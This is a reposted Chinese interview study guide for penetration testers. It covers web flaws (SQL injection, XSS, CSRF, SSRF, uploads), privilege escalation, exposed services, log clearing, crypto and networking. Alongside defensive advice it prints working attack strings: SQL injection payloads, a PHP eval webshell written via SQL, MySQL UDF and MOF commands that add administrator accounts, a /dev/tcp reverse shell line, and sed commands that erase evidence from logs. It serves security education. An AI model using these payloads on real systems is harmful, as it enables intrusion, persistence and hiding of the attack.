<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”
HTTP/1.1Host:***.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))
2）通過floor報錯 向下取整
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10）.exp()select from test where id=1 and exp(~(select * from

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

select '一句話' into outfile '路徑'
select '一句話' into dumpfile '路徑'
select '<?php eval($_POST[1]) ?>' into dumpfile  'd:\wwwroot\baidu.com\nvhack.php';

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

53、為什么aspx木馬權限比asp大？

aspx使用的是.net技術，IIS 中默認不支持，ASP只是腳本語言而已，入侵的時候asp的木馬一般是guest權限…APSX的木馬一般是users權限，

54、如何繞過waf？

大小寫轉換法
干擾字符 /!/
編碼 base64 unicode hex url ascll
復引數

55、如何向服務器寫入webshell？

各種上傳漏洞
mysql具有寫入權限,用sql陳述句寫入shell
http put方法

56、滲透測驗中常見的埠

a、web類(web漏洞/敏感目錄) 第三方通用組件漏洞struts thinkphp jboss ganglia zabbix

80 web
80-89 web
8000-9090 web

b、資料庫類(掃描弱口令)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

c、特殊服務類(未授權/命令執行類/漏洞)

443 SSL心zang滴血
873 Rsync未授權
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授權
7001,7002 WebLogic默認弱口令，反序列
9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞
11211 memcache未授權訪問
27017,27018 Mongodb未授權訪問
50000 SAP命令執行
50070,50030 hadoop默認埠未授權訪問

d、常用埠類(掃描弱口令/埠爆破)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由，默認密碼zebra
3389 遠程桌面

ALL、埠合計詳情

21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL心zang滴血以及一些web漏洞測驗
445 SMB
512,513,514 Rexec
873 Rsync未授權
1025,111 NFS
1433 MSSQL
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主機管理系統登陸 （國外用較多）
2222 DA虛擬主機管理系統登陸 （國外用較多）
2601,2604 zebra路由，默認密碼zebra
3128 squid代理默認埠，如果沒設定口令很可能就直接漫游內網了
3306 MySQL
3312/3311 kangle主機管理系統登陸
3389 遠程桌面
4440 rundeck 參考WooYun: 借用新浪某服務成功漫游新浪內網
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 參考WooYun: Varnish HTTP accelerator CLI 未授權訪問易導致網站被直接篡改或者作為代理進入內網
6379 redis未授權
7001,7002 WebLogic默認弱口令，反序列
7778 Kloxo主機控制面板登錄
8000-9090 都是一些常見的web埠，有些運維喜歡把管理后臺開在這些非80的埠上
8080 tomcat/WDCP主機管理系統，默認弱口令
8080,8089,9090 JBOSS
8083 Vestacp主機管理系統 （國外用較多）
8649 ganglia
8888 amh/LuManager 主機管理系統默認埠
9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞
10000 Virtualmin/Webmin 服務器虛擬主機管理系統
11211 memcache未授權訪問
27017,27018 Mongodb未授權訪問
28017 mongodb統計頁面
50000 SAP命令執行
50070,50030 hadoop默認埠未授權訪問

三、某安全廠商一面

了解哪些漏洞

檔案上傳有哪些防護方式

用什么掃描埠，目錄

如何判斷注入

注入有防護怎么辦

有沒有寫過tamper

3306 1443 8080是什么埠

計算機網路從物理層到應用層xxxx

有沒有web服務開發經驗

如何向服務器寫入webshell

有沒有用過xss平臺

網站滲透的流程

mysql兩種提權方式（udf，？）

常見加密方式xxx

ddos如何防護

有沒有抓過包，會不會寫wireshark過濾規則

清理日志要清理哪些

四、SQL注入防護

1、使用安全的API
2、對輸入的特殊字符進行Escape轉義處理
3、使用白名單來規范化輸入驗證方法
4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字符
5、服務器端在提交資料庫進行SQL查詢之前，對特殊字符進行過濾、轉義、替換、洗掉，
6、規范編碼,字符集

五、為什么引數化查詢可以防止SQL注入

原理:

使用引數化查詢資料庫服務器不會把引數的內容當作sql指令的一部分來執行，是在資料庫完成sql指令的編譯河駁用引數運行

簡單的說: 引數化能防注入的原因在于,陳述句是陳述句，引數是引數，引數的值并不是陳述句的一部分，資料庫只按陳述句的語意跑

六、SQL頭注入點

UA
REFERER
COOKIE
IP

七、盲注是什么？怎么盲注？

盲注是在SQL注入攻擊程序中，服務器關閉了錯誤回顯，我們單純通過服務器回傳內容的變化來判斷是否存在SQL注入和利用的方式，盲注的手段有兩種，一個是通過頁面的回傳內容是否正確(boolean-based)，來驗證是否存在注入，一個是通過sql陳述句處理時間的不同來判斷是否存在注入(time-based)，在這里，可以用benchmark，sleep等造成延時效果的函式，也可以通過構造大笛卡兒積的聯合查詢表來達到延時的目的，

八、寬位元組注入產生原理以及根本原因

1、產生原理

在資料庫使用了寬字符集而WEB中沒考慮這個問題的情況下，在WEB層，由于0XBF27是兩個字符，在PHP中比如addslash和magic_quotes_gpc開啟時，由于會對0x27單引號進行轉義，因此0xbf27會變成0xbf5c27,而資料進入資料庫中時，由于0XBF5C是一個另外的字符，因此\轉義符號會被前面的bf帶著"吃掉"，單引號由此逃逸出來可以用來閉合陳述句，

2、在哪里編碼

3、根本原因

character_set_client(客戶端的字符集)和character_set_connection(連接層的字符集)不同,或轉換函式如，iconv、mb_convert_encoding使用不當，

4、解決辦法

統一資料庫、Web應用、作業系統所使用的字符集，避免決議產生差異，最好都設定為UTF-8，或對資料進行正確的轉義，如mysql_real_escape_string+mysql_set_charset的使用，

5、SQL里面只有update怎么利用

先理解這句 SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

如果此 SQL 被修改成以下形式，就實作了注入

a、修改 homepage 值為http://xxx.net', userlevel='3

之后 SQL 陳述句變為

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel 為用戶級別

b、修改 password 值為mypass)' WHERE username='admin'#

之后 SQL 陳述句變為

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

c、修改 id 值為' OR username='admin'之后 SQL 陳述句變為

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

九、SQL如何寫shell/單引被過濾怎么辦

寫shell: root權限，GPC關閉，知道檔案路徑 outfile函式

http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'

http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'

寬位元組注入

1、代替空格的方法

%0a、%0b、%a0 等
/**/ 等注釋符
<>

2、mysql的網站注入，5.0以上和5.0以下有什么區別

5.0以下沒有information_schema這個系統表，無法串列名等，只能暴力跑表名，

5.0以下是多用戶單操作，5.0以上是多用戶多操做，

十、XSS

1、XSS原理

反射型

用戶提交的資料中可以構造代碼來執行，從而實作竊取用戶資訊等攻擊，需要誘使用戶“點擊”一個惡意鏈接，才能攻擊成功

存盤型

存盤型XSS會把用戶輸入的資料“存盤”在服務器端，這種XSS具有很強的穩定性，

DOM型

通過修改頁面的DOM節點形成的XSS，稱之為DOM Based XSS，

2、DOM型和反射型的區別

反射型XSS：通過誘導用戶點擊，我們構造好的惡意payload才會觸發的XSS，反射型XSS的檢測我們在每次請求帶payload的鏈接時頁面應該是會帶有特定的畸形資料的，DOM型：通過修改頁面的DOM節點形成的XSS，DOM-based XSS由于是通過js代碼進行dom操作產生的XSS，所以在請求的回應中我們甚至不一定會得到相應的畸形資料，根本區別在我看來是輸出點的不同，

3、DOM型和XSS自動化測驗或人工測驗

人工測驗思路：找到類似document.write、innerHTML賦值、outterHTML賦值、window.location操作、寫javascript:后內容、eval、setTimeout 、setInterval 等直接執行之類的函式點，找到其變數，回溯變數來源觀察是否可控，是否經過安全函式，自動化測驗參看道哥的博客，思路是從輸入入手，觀察變數傳遞的程序，最終檢查是否有在危險函式輸出，中途是否有經過安全函式，但是這樣就需要有一個javascript決議器，否則會漏掉一些通過js執行帶入的部分內容，

在回答這段問題的時候，由于平時對客戶的檢測中，基本是憑借不同功能點的功能加上經驗和直覺來進行檢測，對不同型別的XSS檢測方式實際上并沒有太過細分的標準化檢測方式，所以回答的很爛，，，

4、如何快速發現XSS位置

5、對于XSS怎么修補建議

輸入點檢查：對用戶輸入的資料進行合法性檢查，使用filter過濾敏感字符或對進行編碼轉義，針對特定型別資料進行格式檢查，針對輸入點的檢查最好放在服務器端實作，

輸出點檢查：對變數輸出到HTML頁面中時，對輸出內容進行編碼轉義，輸出在HTML中時，對其進行HTMLEncode，如果輸出在Javascript腳本中時，對其進行JavascriptEncode，對使用JavascriptEncode的變數都放在引號中并轉義危險字符，data部分就無法逃逸出引號外成為code的一部分，還可以使用更加嚴格的方法，對所有數字字母之外的字符都使用十六進制編碼，此外，要注意在瀏覽器中，HTML的決議會優先于Javascript的決議，編碼的方式也需要考慮清楚，針對不同的輸出點，我們防御XSS的方法可能會不同，這點可能在之后的文章會做下總結，

除此之外，還有做HTTPOnly對Cookie劫持做限制，

6、XSS蠕蟲的生產條件

正常情況下，一個是產生XSS點的頁面不屬于self頁面，用戶之間產生互動行為的頁面，都可能造成XSS Worm的產生，
不一定需要存盤型XSS

十一、CSRF

1、CSRF原理

CSRF是跨站請求偽造攻擊，由客戶端發起,是由于沒有在關鍵操作執行時進行是否由用戶自愿發起的確認

2、防御

驗證Referer
添加token

3、token和referer做橫向對比，誰安全等級高？

token安全等級更高，因為并不是任何服務器都可以取得referer，如果從HTTPS跳到HTTP，也不會發送referer，并且FLASH一些版本中可以自定義referer，但是token的話，要保證其足夠隨機且不可泄露，(不可預測性原則)

4、對referer的驗證，從什么角度去做？如果做，怎么杜絕問題

對header中的referer的驗證，一個是空referer，一個是referer過濾或者檢測不完善，為了杜絕這種問題，在驗證的白名單中，正則規則應當寫完善，

5、針對token,對token測驗會注意哪方面被人，會對token的哪方面進行測驗？

參考一段請教前輩的回答：

針對token的攻擊，一是對它本身的攻擊，重放測驗一次性、分析加密規則、校驗方式是否正確等，二是結合資訊泄露漏洞對它的獲取，結合著發起組合攻擊
資訊泄露有可能是快取、日志、get，也有可能是利用跨站
很多跳轉登錄的都依賴token，有一個跳轉漏洞加反射型跨站就可以組合成登錄劫持了
另外也可以結合著其它業務來描述token的安全性及設計不好怎么被繞過比如搶紅包業務之類的

十一、SSRF

SSRF(Server-Side Request Forgery:服務器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞，一般情況下，SSRF攻擊的目標是從外網無法訪問的內部系統，（正是因為它是由服務端發起的，所以它能夠請求到與它相連而與外網隔離的內部系統）

SSRF 形成的原因大都是由于服務端提供了從其他服務器應用獲取資料的功能且沒有對目標地址做過濾與限制，比如從指定URL地址獲取網頁文本內容，加載指定地址的圖片，下載等等，

1、監測

SSRF漏洞的驗證方法：

1）因為SSRF漏洞是讓服務器發送請求的安全漏洞，所以我們就可以通過抓包分析發送的請求是否是由服務器的發送的，從而來判斷是否存在SSRF漏洞

2）在頁面原始碼中查找訪問的資源地址 ，如果該資源地址型別為 www.baidu.com/xxx.php?image=（地址）的就可能存在SSRF漏洞 4[1]

2、SSRF漏洞的成因 防御 繞過

成因：模擬服務器對其他服務器資源進行請求，沒有做合法性驗證，利用：構造惡意內網IP做探測，或者使用其余所支持的協議對其余服務進行攻擊，防御：禁止跳轉，限制協議，內外網限制，URL限制，繞過：使用不同協議，針對IP，IP格式的繞過，針對URL，惡意URL增添其他字符，@之類的，301跳轉+dns rebindding，

十二、上傳

1、檔案上傳漏洞原理

由于程式員在對用戶檔案上傳部分的控制不足或者處理缺陷，而導致用戶可以越過其本身權限向服務器上傳可執行的動態腳本檔案

2、常見的上傳繞過方式

前端js驗證：禁用js/burp改包
大小寫
雙重后綴名
過濾繞過 pphphp->php

3、防護

檔案上傳目錄設定為不可執行
使用白名單判斷檔案上傳型別
用亂數改寫檔案名和路徑

4、審查上傳點的元素有什么意義？

有些站點的上傳檔案型別的限制是在前端實作的，這時只要增加上傳型別就能突破限制了，

十三、檔案包含

1、原理

引入一段用戶能控制的腳本或代碼，并讓服務器端執行 include()等函式通過動態變數的方式引入需要包含的檔案；
用戶能夠控制該動態變數，

2、導致檔案包含的函式

PHP：include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet：ava.io.File(), java.io.Fil-eReader(), … ASP：include file, include virtual,

3、本地檔案包含

能夠打開并包含本地檔案的漏洞，被稱為本地檔案包含漏洞

十四、邏輯漏洞

1、金融行業常見邏輯漏洞

單針對金融業務的 主要是資料的篡改(涉及金融資料，或部分業務的判斷資料)，由競爭條件或者設計不當引起的薅羊毛，交易/訂單資訊泄露，水平越權對別人的賬戶查看或惡意操作，交易或業務步驟繞過，

十五、中間人攻擊

中間人攻擊是一個（缺乏）相互認證的攻擊；由于客戶端與服務器之間在SSL握手的程序中缺乏相互認證而造成的漏洞

防御中間人攻擊的方案通常基于一下幾種技術

1.公鑰基礎建設PKI 使用PKI相互認證機制，客戶端驗證服務器，服務器驗證客戶端；上述兩個例子中都是只驗證服務器，這樣就造成了SSL握手環節的漏洞，而如果使用相互認證的的話，基本可以更強力的相互認證

2.延遲測驗

使用復雜加密哈希函式進行計算以造成數十秒的延遲；如果雙方通常情況下都要花費20秒來計算，并且整個通訊花費了60秒計算才到達對方，這就能表明存在第三方中間人，

3.使用其他形式的密鑰交換形式

ARP欺騙

原理

每臺主機都有一個ARP快取表，快取表中記錄了IP地址與MAC地址的對應關系，而局域網資料傳輸依靠的是MAC地址，在ARP快取表機制存在一個缺陷，就是當請求主機收到ARP應答包后，不會去驗證自己是否向對方主機發送過ARP請求包，就直接把這個回傳包中的IP地址與MAC地址的對應關系保存進ARP快取表中，如果原有相同IP對應關系，原有的則會被替換，這樣攻擊者就有了偷聽主機傳輸的資料的可能

防護

1.在主機系結網關MAC與IP地址為靜態（默認為動態），命令：arp -s 網關IP 網關MAC

2.在網關系結主機MAC與IP地址

3.使用ARP防火墻

十六、DDOS

1、DDOS原理

利用合理的請求造成資源過載，導致服務不可用

syn洪流的原理

偽造大量的源IP地址，分別向服務器端發送大量的SYN包，此時服務器端會回傳SYN/ACK包，因為源地址是偽造的，所以偽造的IP并不會應答，服務器端沒有收到偽造IP的回應，會重試3～5次并且等待一個SYNTime（一般為30秒至2分鐘），如果超時則丟棄這個連接，攻擊者大量發送這種偽造源地址的SYN請求，服務器端將會消耗非常多的資源（CPU和記憶體）來處理這種半連接，同時還要不斷地對這些IP進行SYN+ACK重試，最后的結果是服務器無暇理睬正常的連接請求，導致拒絕服務，

CC攻擊原理

對一些消耗資源較大的應用頁面不斷發起正常的請求，以達到消耗服務端資源的目的，

2、DOSS防護

SYN Cookie/SYN Proxy、safereset等演算法，SYN Cookie的主要思想是為每一個IP地址分配一個“Cookie”，并統計每個IP地址的訪問頻率，如果在短時間內收到大量的來自同一個IP地址的資料包，則認為受到攻擊，之后來自這個IP地址的包將被丟棄，

十七、提權

MySQL兩種提權方式

udf提權,mof提權

MySQL_UDF提取

要求: 1.目標系統是Windows(Win2000,XP,Win2003)；2.擁有MYSQL的某個用戶賬號，此賬號必須有對mysql的insert和delete權限以創建和拋棄函式 3.有root賬號密碼 匯出udf: MYSQL 5.1以上版本，必須要把udf.dll檔案放到MYSQL安裝目錄下的lib\plugin檔案夾下才能創建自定義函式 可以再mysql里輸入select @@basedirshow variables like ‘%plugins%’ 尋找mysql安裝路徑 提權:

使用SQL陳述句創建功能函式，語法：Create Function 函式名（函式名只能為下面串列中的其中之一）returns string soname ‘匯出的DLL路徑’；

create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
select cmdshell(‘net localgroup administrators arsch /add’);

drop function cmdshell;

該目錄默認是不存在的，這就需要我們使用webshell找到MYSQL的安裝目錄，并在安裝目錄下創建lib\plugin檔案夾，然后將udf.dll檔案匯出到該目錄即可，

MySQL mof提權

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa “Win32_LocalTime” "
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(“WScript.Shell”)\nWSH.run(“net.exe user waitalone waitalone.cn /add”)”;
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

其中的第18行的命令，上傳前請自己更改，

2、執行load_file及into dumpfile把檔案匯出到正確的位置即可，

select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'

執行成功后，即可添加一個普通用戶，然后你可以更改命令，再上傳匯出執行把用戶提升到管理員權限，然后3389連接之就ok了，

十八、特殊漏洞

1、Struts2-045

2、Redis未授權

產生原因

Redis 默認情況下，會系結在 0.0.0.0:6379，這樣將會將 Redis 服務暴露到公網上，如果在沒有開啟認證的情況下，可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的資料，攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法，可以成功在 Redis 服務器上寫入公鑰，進而可以使用對應私鑰直接登錄目標服務器

利用條件和方法

條件:

a、redis服務以root賬戶運行
b、redis無密碼或弱密碼進行認證
c、redis監聽在0.0.0.0公網上

方法:

a、通過 Redis 的 INFO 命令, 可以查看服務器相關的引數和敏感資訊, 為攻擊者的后續滲透做鋪墊
b、上傳SSH公鑰獲得SSH登錄權限
c、通過crontab反彈shell
d、slave主從模式利用

修復

密碼驗證
降權運行
限制ip/修改埠

3、Jenkins未授權訪問

4、MongoDB未授權訪問

攻擊者通過未授權訪問進入腳本命令執行界面執行攻擊指令

println "ifconfig -a".execute().text 執行一些系統命令,利用wget下載webshell

開啟MongoDB服務時不添加任何引數時,默認是沒有權限驗證的,而且可以遠程訪問資料庫，登錄的用戶可以通過默認埠無需密碼對資料庫進行增、刪、改、查等任意高危操作，

防護

為MongoDB添加認證：1)MongoDB啟動時添加–auth引數 2)給MongoDB添加用戶：use admin #使用admin庫 db.addUser(“root”, “123456”) #添加用戶名root密碼123456的用戶 db.auth(“root”,“123456”) #驗證下是否添加成功，回傳1說明成功 2、禁用HTTP和REST埠 MongoDB自身帶有一個HTTP服務和并支持REST介面，在2.6以后這些介面默認是關閉的，mongoDB默認會使用默認埠監聽web服務，一般不需要通過web方式進行遠程管理，建議禁用，修改組態檔或在啟動的時候選擇–nohttpinterface 引數nohttpinterface=false 3、限制系結IP 啟動時加入引數 –bind_ip 127.0.0.1 或在/etc/mongodb.conf檔案中添加以下內容：bind_ip = 127.0.0.1

5、Memcache未授權訪問

Memcached是一套常用的key-value快取系統，由于它本身沒有權限控制模塊，所以對公網開放的Memcache服務很容易被攻擊者掃描發現，攻擊者通過命令互動可直接讀取Memcached中的敏感資訊，

利用

a、登錄機器執行netstat -an |more命令查看埠監聽情況，回顯0.0.0.0:11211表示在所有網卡進行監聽，存在memcached未授權訪問漏洞，

b、telnet 11211，或nc -vv 11211，提示連接成功表示漏洞存在

漏洞加固

a、設定memchached只允許本地訪問 b、禁止外網訪問Memcached 11211埠 c、編譯時加上–enable-sasl，啟用SASL認證

6、FFMPEG本地檔案讀取

原理

通過呼叫加密API將payload加密放入一個會被執行的段位元組中，但是具體回答工程中我只回答道了SSRF老洞，m3u8頭，偏移量，加密，

十九、安全知識

1、WEB

常見WEB開發JAVA框架

STRUTS,SPRING 常見的java框架漏洞 其實面試官問這個問題的時候我不太清楚他要問什么，我提到struts的045 048，java常見反序列化，045 錯誤處理引入了ognl運算式 048 封裝action的程序中有一步呼叫getstackvalue遞回獲取ognl運算式 反序列化 操作物件，通過手段引入，apache common的反射機制、readobject的重寫，其實具體的我也記不清楚，，，然后這部分就結束了

同源策略

同源策略限制不同源對當前document的屬性內容進行讀取或設定，不同源的區分：協議、域名、子域名、IP、埠，以上有不同時即不同源，

Jsonp安全攻防技術，怎么寫Jsonp的攻擊頁面

涉及到Jsonp的安全攻防內容

JSON劫持、Callback可定義、JSONP內容可定義、Content-type不為json，

攻擊頁面

JSON劫持，跨域劫持敏感資訊，頁面類似于

function wooyun(v){
alert(v.username);
}

Content-type不正確情況下，JSONP和Callback內容可定義可造成XSS，JSONP和FLASH及其他的利用參照知道創宇的JSONP安全攻防技術，

2、PHP

php中命令執行涉及到的函式

代碼執行：eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function()

檔案讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
安全模式下繞過php的disable fuction

DL函式，組件漏洞，環境變數，
PHP弱型別

== 在進行比較的時候，會先將字串型別轉化成相同，再比較

如果比較一個數字和字串或者比較涉及到數字內容的字串，則字串會被轉換成數值并且比較按照數值來進行

0e開頭的字串等于0

3、資料庫

各種資料庫檔案存放的位置

mysql:
/usr/local/mysql/data/ 
C:\ProgramData\MySQL\MySQL Server 5.6\Data\
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/

4、系統

如何清理日志

meterpreter: clearev
入侵 Linux 服務器后需要清除哪些日志？

web日志，如apache的access.log,error.log，直接將日志清除過于明顯,一般使用sed進行定向清除

e.g. sed -i -e ‘/192.169.1.1/d’

history命令的清除，也是對~/.bash_history進行定向清除

wtmp日志的清除，/var/log/wtmp

登錄日志清除 /var/log/secure
LINUX
查看當前埠連接的命令有哪些？netstat 和 ss 命令的區別和優缺點

netstat -antp` `ss -l

ss的優勢在于它能夠顯示更多更詳細的有關TCP和連接狀態的資訊，而且比netstat更快速更高效，
反彈 shell 的常用命令？一般常反彈哪一種 shell？為什么?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

通過Linux系統的/proc目錄 ，能夠獲取到哪些資訊，這些資訊可以在安全上有哪些應用？

ls /proc

系統資訊，硬體資訊，內核版本，加載的模塊，行程
linux系統中，檢測哪些組態檔的配置項，能夠提升SSH的安全性，

/etc/ssh/sshd___configiptables配置
如何一條命令查看檔案內容最后一百行

tail -n 100 filename

Windows
如何加固一個域環境下的Windows桌面作業環境？請給出你的思路，

5、密碼學

AES／DES的具體作業步驟
RSA演算法

加密:
密文＝明文^EmodN

RSA加密是對明文的E次方后除以N后求余數的程序
公鑰＝(E,N)

解密:
明文＝密文^DmodN 私鑰＝(D,N)

三個引數n,e1,e2

n是兩個大質數p,q的積
分組密碼的加密模式
如何生成一個安全的亂數？

參考之前一個學長的答案，可以通過一些物理系統生成亂數，如電壓的波動、磁盤磁頭讀/寫時的尋道時間、空中電磁波的噪聲等，
SSL握手程序

建立TCP連接、客戶端發送SSL請求、服務端處理SSL請求、客戶端發送公共密鑰加密過的隨機資料、服務端用私有密鑰解密加密后的隨機資料并協商暗號、服務端跟客戶端利用暗號生成加密演算法跟密鑰key、之后正常通信，這部分本來是忘了的，但是之前看SSL Pinning的時候好像記了張圖在腦子里，掙扎半天還是沒敢確定，遂放棄，，，
對稱加密與非對稱加密的不同，分別用在哪些方面

6、TCP/IP

TCP三次握手的程序以及對應的狀態轉換

（1）客戶端向服務器端發送一個SYN包，包含客戶端使用的埠號和初始序列號x;
（2）服務器端收到客戶端發送來的SYN包后，向客戶端發送一個SYN和ACK都置位的TCP報文，包含確認號xx1和服務器端的初始序列號y;
（3）客戶端收到服務器端回傳的SYNSACK報文后，向服務器端回傳一個確認號為yy1、序號為xx1的ACK報文，一個標準的TCP連接完成，
TCP和UDP協議區別

tcp面向連接,udp面向報文 tcp對系統資源的要求多 udp結構簡單 tcp保證資料完整性和順序，udp不保證
https的建立程序

a、客戶端發送請求到服務器端
b、服務器端回傳證書和公開密鑰，公開密鑰作為證書的一部分而存在
c、客戶端驗證證書和公開密鑰的有效性，如果有效，則生成共享密鑰并使用公開密鑰加密發送到服務器端
d、服務器端使用私有密鑰解密資料，并使用收到的共享密鑰加密資料，發送到客戶端
e、客戶端使用共享密鑰解密資料
f、SSL加密建立

7、流量分析

wireshark簡單的過濾規則

過濾ip:

過濾源ip地址:ip.src1.1.1.1;,目的ip地址:ip.dst1.1.1.1;

過濾埠:

過濾80埠:tcp.port80,源埠:tcp.srcport80,目的埠:tcp.dstport==80

協議過濾:

直接輸入協議名即可,如http協議http

http模式過濾:

過濾get/post包http.request.mothod=="GET/POST"

8、防火墻

簡述路由器交換機、防火墻等網路設備常用的幾個基礎配置加固項，以及配置方法，

本文轉自[https://www.freebuf.com/articles/web/245742.html](https://www.freebuf.com/articles/web/245742.html)